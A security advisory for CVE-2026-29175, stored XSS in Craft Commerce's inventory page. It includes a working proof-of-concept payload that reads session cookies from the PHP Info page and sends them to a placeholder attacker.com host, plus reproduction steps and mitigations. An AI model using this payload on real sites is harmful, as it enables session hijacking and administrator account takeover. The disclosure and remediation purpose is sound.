CVE-2026-29175
Craft Commerce has multiple Stored XSS in Commerce Inventory Page, Leading to Session Hijacking
Description
## Summary Stored XSS vulnerabilities exist in the Commerce Inventory page. The **Product Title**, **Variant Title**, and **Variant SKU** fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page. This vulnerability enables **session hijacking** by fetching the PHP Info utility page, which displays unmasked session cookies. Unlike other XSS chains that require elevated sessions, this attack provides instant access to the victim’s session - no additional user interaction or elevated session approval required. ## Proof of Concept ### Permissions Required - Access the control panel - Access Craft Commerce - Create/Edit products ### Steps to Reproduce 1. Log in to the control panel 2. Navigate to **Commerce → Products** 3. Add a new product and set the **Title** field to: (replace `https://attacker.com`) ```html <img src=x onerror="fetch('/admin/utilities/php-info').then(r=>r.text()).then(t=>{m=t.match(/<th[^>]*>Cookie[^<]*<\/th>\s*<td[^>]*>([\s\S]*?)<\/td>/);if(m)new Image().src='https://attacker.com/s?c='+btoa(m[1])})"> ``` 4. Save the product 5. Navigate to **Commerce → Inventory** (`/admin/commerce/inventory`) 6. XSS executes, fetches PHP Info page, extracts session cookies, and exfiltrates them to the attacker server ### Cookie Extraction Details The PHP Info page (`/admin/utilities/php-info`) displays cookie values (unmasked) in multiple locations: - `HTTP_COOKIE` - `Cookie` (used in this PoC) - `$_SERVER['HTTP_COOKIE']` - `$_COOKIE['<cookie-name>']` ### Notes - The same vulnerability exists in **Variant Title** and **Variant SKU** fields while creating a product. The PoC focuses on Product Title, but the same attack works for the other two fields. - `$_COOKIE['CRAFT_CSRF_TOKEN']` is masked in PHP Info, but the unmasked value is available in the other parameters listed above. - This vulnerability can also be chained to achieve full database exfiltration or do it after hijacking an administrator session. ## Mitigation 1. Sanitize product and variant fields when rendering in the inventory template 2. Mask sensitive cookie values in the PHP Info utility page (similar to how `CRAFT_CSRF_TOKEN`, `CRAFT_SECURITY_KEY`, and `CRAFT_DB_PASSWORD` are already masked)
How to fix CVE-2026-29175
To remediate CVE-2026-29175, upgrade the affected package to a fixed version below.
- —upgrade to 5.5.3 or later